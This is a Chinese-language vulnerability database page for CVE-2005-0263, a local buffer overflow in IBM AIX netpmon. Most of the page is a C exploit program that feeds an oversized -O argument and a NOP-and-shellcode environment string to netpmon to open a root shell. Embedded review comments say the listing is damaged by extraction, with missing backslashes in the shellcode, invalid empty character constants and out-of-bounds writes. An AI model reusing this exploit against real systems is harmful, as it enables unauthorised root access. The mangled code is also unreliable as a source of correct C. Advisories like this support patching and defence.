IBM AIX netpmon本地缓冲区溢出漏洞

IBM AIX netpmon本地缓冲区溢出漏洞

漏洞ID 1108861 漏洞类型 缓冲区溢出
发布时间 2005-06-14 更新时间 2005-10-20
CVE编号 CVE-2005-0263
CNNVD-ID CNNVD-200505-507
漏洞平台 AIX CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/1044
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-507
|漏洞详情
IBM AIX是一款商业性质的操作系统。IBM AIX netpmon不正确处理-O选项,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能获得root用户权限。netpmon用于监视网络I/O和网络相关的CPU使用率,由于对-O选项的参数缺少充分缓冲区边界检查,提交超长参数作为-O选项值,可触发缓冲区溢出,可能获得root用户权限。
|漏洞EXP
/*
 *
 *    IBM AIX netpmon elevated privileges exploit
 *
 *    I just wanted to play with PowerPC (Tested on 5.2)
 *
 *    intropy (intropy <at> caughq.org)
 *
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

#define DEBUG 1
#define BUFFERSIZE 2048
#define EGGSIZE 2048

#define NOP 0x60
#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)

/*
 * Payload bytes intended for the environment string built by
 * cex_load_environment(): a short PowerPC stub (per the inline mnemonics)
 * followed by the string "/bin/sh".
 *
 * NOTE(review): as extracted, the hex escape sequences have lost their
 * backslashes, so each "xNN" below is three literal ASCII characters rather
 * than one byte; the array as shown holds text, not the instructions the
 * comments describe. Kept verbatim; the listing is an extraction artifact.
 */
char shellcode_binsh[] =
"x7cxa5x2ax79"     /* xor.    r5,r5,r5             */
"x40x82xffxfd"     /* bnel    <shellcode>          */
"x7fxe8x02xa6"     /* mflr    r31                  */
"x3bxffx01x20"     /* cal     r31,0x120(r31)       */
"x38x7fxffx08"     /* cal     r3,-248(r31)         */
"x38x9fxffx10"     /* cal     r4,-240(r31)         */
"x90x7fxffx10"     /* st      r3,-240(r31)         */
"x90xbfxffx14"     /* st      r5,-236(r31)         */
"x88x5fxffx0f"     /* lbz     r2,-241(r31)         */
"x98xbfxffx0f"     /* stb     r5,-241(r31)         */
"x4cxc6x33x42"     /* crorc   cr6,cr6,cr6          */
"x44xffxffx02"     /* svca                         */
"/bin/sh"
"x05";

/*
 * Fill the two strings that main() hands to execve():
 *   env_buffer     - a run of NOP bytes followed by `payload`, used as the
 *                    single environment string;
 *   address_buffer - `buffer_size` bytes of 'A', then overwritten with
 *                    repeated copies of ADDRESS, used as the value of -O.
 *
 * The caller owns both buffers (allocated in main() with EGGSIZE and
 * BUFFERSIZE). Always returns 0; main() does not check the result.
 *
 * NOTE(review): as extracted, this block does not compile — the two empty
 * character constants ('') are invalid C and were presumably mangled during
 * extraction. Several writes below also extend past the sizes the caller
 * allocates (see the per-line notes). The code is kept unchanged and only
 * annotated; the referenced IBM APARs (IY67807, IY67136, IY67124) address
 * the underlying missing bounds check in netpmon's -O handling.
 */
unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
        /* env_size exceeds environment_size by strlen(payload) + 5, while
         * environment_size (EGGSIZE) is also the caller's allocation size
         * for env_buffer. */
        int count, env_size = strlen(payload) + environment_size + 4 + 1;
        unsigned long address, *ret_addressp;
        
        /* The trailing 'n' in the DEBUG messages looks like a newline escape
         * whose backslash was lost in extraction. */
        if (DEBUG) printf("Adding nops to environment buffer...");
        /* NOP run: env_size - strlen(payload) - 1 == environment_size + 4 bytes,
         * i.e. 4 more than the caller allocated. count (int) is compared with
         * a size_t expression here and in the next loop. */
        for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
            *(env_buffer++) = NOP;
        }
        if (DEBUG) printf("size %d...n", count);
        if (DEBUG) printf("Adding payload to environment buffer...");
        /* Append payload byte by byte; env_buffer keeps advancing. */
        for ( count = 0; count < strlen(payload); count++ ) {
            *(env_buffer++) = payload[count];
        }
        if (DEBUG) printf("size %d...n", count);

        /* '' is an empty character constant — invalid C, presumably an
         * extraction artifact. env_buffer has already been advanced past
         * everything written above, so this index is relative to that end
         * position, not to the start of the buffer. */
        env_buffer[env_size - 1] = '';

        /* Same caveat: written at the advanced pointer, i.e. after the payload. */
        memcpy(env_buffer, "CAU=", 4);

	memset(address_buffer, 'A', buffer_size);   /* filler for the -O argument */

        address = ADDRESS;   /* hard-coded constant, see #define ADDRESS */

        if (DEBUG) printf("Going for address @ 0x%lxn", address);

        if (DEBUG) printf("Adding return address to buffer...");
        /* Starts 3 bytes into address_buffer, so every store is unaligned.
         * With a 4-byte unsigned long the buffer_size/4 stores cover
         * buffer_size bytes from offset 3, ending 3 bytes past the
         * allocation; with an 8-byte unsigned long they cover twice that. */
        ret_addressp = (unsigned long *)(address_buffer+3);
        for ( count = 0; count < buffer_size; count += 4) {
                *(ret_addressp++) = address;
        }
        if (DEBUG) printf("size %d...n", count);

        /* Empty character constant again (see above). */
        address_buffer[buffer_size - 1] = '';

        return( 0 );
}

/*
 * Allocate the environment and argument strings, fill them via
 * cex_load_environment(), and replace this process with
 * "/usr/bin/netpmon -O <buffer>", passing the filled egg as the only
 * environment string.
 *
 * NOTE(review): args is declared with 3 elements but 4 are assigned
 * (args[3] = NULL), an out-of-bounds write on the stack. Neither malloc()
 * result is checked before use, and execve()'s return value (it returns
 * only on failure) is ignored, so a failed exec falls through to return 0.
 */
int main()
{
    char *buffer, *egg;
    char *args[3], *envs[2];   /* NOTE(review): args has 3 slots but 4 are assigned below */

    /* Unchecked allocations; cex_load_environment() writes through both. */
    buffer = (char *)malloc(BUFFERSIZE);
    egg = (char *)malloc(EGGSIZE);

    /* Return value (always 0) is ignored. */
    cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);

    args[0] = "/usr/bin/netpmon";
    args[1] = "-O";
    args[2] = buffer;
    args[3] = NULL;   /* out of bounds: args was declared with 3 elements */

    envs[0] = egg;
    envs[1] = NULL;

    /* execve() returns only on failure; that case is not handled. */
    execve( "/usr/bin/netpmon", args, envs );

    return( 0 );
}

// milw0rm.com [2005-06-14]
|参考资料

来源:IDEFENSE
名称:20050210 IBM AIX netpmon Local Buffer Overflow Vulnerability
链接:http://www.idefense.com/application/poi/display?id=197&type=vulnerabilities
来源:XF
名称:ibm-aix-netpmon-bo(19278)
链接:http://xforce.iss.net/xforce/xfdb/19278
来源:AIXAPAR
名称:IY67807
链接:http://www-1.ibm.com/support/search.wss?rs=0&q=IY67807&apar=only
来源:AIXAPAR
名称:IY67136
链接:http://www-1.ibm.com/support/search.wss?rs=0&q=IY67136&apar=only
来源:AIXAPAR
名称:IY67124
链接:http://www-1.ibm.com/support/search.wss?rs=0&q=IY67124&apar=only
来源:BID
名称:12517
链接:http://www.securityfocus.com/bid/12517
来源:SECUNIA
名称:14237
链接:http://secunia.com/advisories/14237
